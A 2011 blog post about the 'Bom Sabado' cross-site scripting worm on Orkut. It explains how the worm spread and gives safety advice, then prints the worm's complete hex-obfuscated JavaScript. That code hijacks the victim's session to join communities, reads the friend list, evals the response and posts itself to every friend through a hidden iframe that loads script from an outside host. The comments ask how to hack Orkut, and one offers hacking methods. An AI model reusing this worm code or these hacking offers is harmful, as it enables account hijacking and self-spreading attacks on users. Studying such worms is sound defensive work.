Saturday, 2 April 2011

Orkut attacked by 'Bom Sabado' worm




‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’ 
Hi Friends, Did you find this scrap in your scrapbook from many of your friends??? If yes, then dont visit the profile of person from which this message has come, coz ur friend profile is now infected my a Virus named..‘Bom Sabado!’. If you visit any affected profile, your profile and ur system will also get affect by this Virus!!! 

 



What is ‘Bom Sabado!’?
'Bom Sabado' is a new worm of type XSS (cross-site scripting) attack, which is created by keeping total focus on Orkut. 
'Bom Sabado' is a Portuguese word which means 'Good saturday.'
Only one country is there in which Orkut is still no. 1 in social websites, So it is assumed that someone has made this virus to attack on the popularity of Orkut.


How it works?
When any one open page that is infected by this worm. A JavaScript(form http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) will run automatically.which will automatically join some communities and send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends. Also this worm steal cookies from your browser. 


Orkut has Temporarily Fixed the issue.
On Orkut Support Forums, its declared by a 'Top Contributor' that Orkut has Temporarily Fixed the issue. 
Here what can be meant by temporarily... what i guess.. they have only removed the java script from the site http://tptools.org, but it will take time to Fix this 'Hole of Orkut' to save Orkut  in coming times. so Just Be Aware!!!

I will suggest you all to Disable JavaScript of your Browser, to avoid this type of problem :) 


Suggestion for users Affected by Bom Sabado
As This virus steal cookies from browser, so it is suggested to clear ur browser's cookies immediately and change your all passwords.

Coding of Bom Sabado Worm taken from http://tptools.org/
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63\x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x79\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x73\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x23\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72\x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x54\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x36\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x39\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x31\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B","\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;

6 comments:

  1. Nyc wrk dude
    nd thnx for d knwledge

    ReplyDelete
  2. Really cool knwledge cn this virus work nw also plz answer

    ReplyDelete
  3. Cn dis virus work now also?
    Answer zaroor btaiyega

    ReplyDelete
  4. Can you please tell me how to hack orkut

    ReplyDelete
  5. Plz tell me some ways to hack orkut
    my mail id is riya.sharma141@gmail.com

    ReplyDelete
  6. @jyoti
    well the most common and the best ways that have about 60%chances of success are all listed on how to hack mail accounts
    bt if you want i will post the best way to hack orkut

    ReplyDelete